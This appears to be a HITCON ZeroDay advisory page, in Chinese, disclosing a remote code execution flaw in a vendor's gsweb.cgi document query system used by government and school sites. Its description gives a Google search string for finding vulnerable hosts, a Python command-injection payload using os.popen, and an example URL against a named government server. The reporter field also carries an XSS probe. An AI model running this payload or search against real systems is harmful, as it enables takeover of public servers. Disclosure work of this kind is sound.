飛資得企業集團資料查詢系統 Remote Code Execution

Vulnerability Overview

ZDID: ZD-2018-01013
發信 Vendor: 飛資得企業集團
Title: 飛資得企業集團資料查詢系統 Remote Code Execution
Introduction: RCE

處理狀態

目前狀態

公開

Last Update : 2019/04/26

新提交
已審核
已通報
已修補
未複測
公開

處理歷程

2018/07/21 21:06:33 : 新提交 (由 <svg/onload=alert(1)> 更新此狀態)
2018/07/21 21:50:24 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2018/07/23 11:39:31 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2018/07/23 11:39:31 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2018/09/20 03:00:04 : 公開 (由 HITCON ZeroDay 平台自動更新)
2018/09/20 21:19:23 : 公開 (由 HITCON ZeroDay 服務團隊更新此狀態)
2018/09/20 21:19:32 : 暫停 (由 HITCON ZeroDay 服務團隊更新此狀態)
2018/09/20 21:37:27 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2018/09/21 02:49:18 : 暫停 (由 HITCON ZeroDay 服務團隊更新此狀態)
2019/04/08 16:28:58 : 複測申請中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2019/04/26 03:00:04 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

ZDID：ZD-2018-01013
通報者：morrow (<svg/onload=alert(1)>)
風險：嚴重
類型：遠端命令執行 (Remote Code Execution)

參考資料

攻擊者可經由該漏洞取得主機完整權限、任意寫入檔案及取得大量內網資訊。

漏洞說明： OWASP - Code Injection
https://www.owasp.org/index.php/Code_Injection

漏洞說明： OWASP - Command Injection
https://www.owasp.org/index.php/Command_Injection

漏洞說明： CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
http://cwe.mitre.org/data/definitions/77.html

漏洞說明： CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
http://cwe.mitre.org/data/definitions/78.html

(本欄位資訊由系統根據漏洞類別自動產生，做為漏洞參考資料。)

敘述

此弱點影響到許多政府、學校、公家單位，建議儘速修復

到 google 上搜尋
```
inurl:"/cgi-bin/gs32/gsweb.cgi/ccd="
```

獲得一組 ccd，並使用下列的 payload

browselevel?field_1=bwsblv1&matrix=1X1&mapflds=&active="%2Bos.popen("id").read()%2B"

3.舉個例子：

https://agridl.tari.gov.tw/cgi-bin/gs32/gsweb.cgi/ccd=看你拿到什麼/browselevel?field_1=bwsblv1&matrix=1X1&mapflds=&active=%22%2Bos.popen(%22id%22).read()%2B%22

4.此問題的發生為：print("argv+lv1") 會被雙引號截斷，我們就可以偽造變成 "+os.system("CMD")+" 執行我們的 command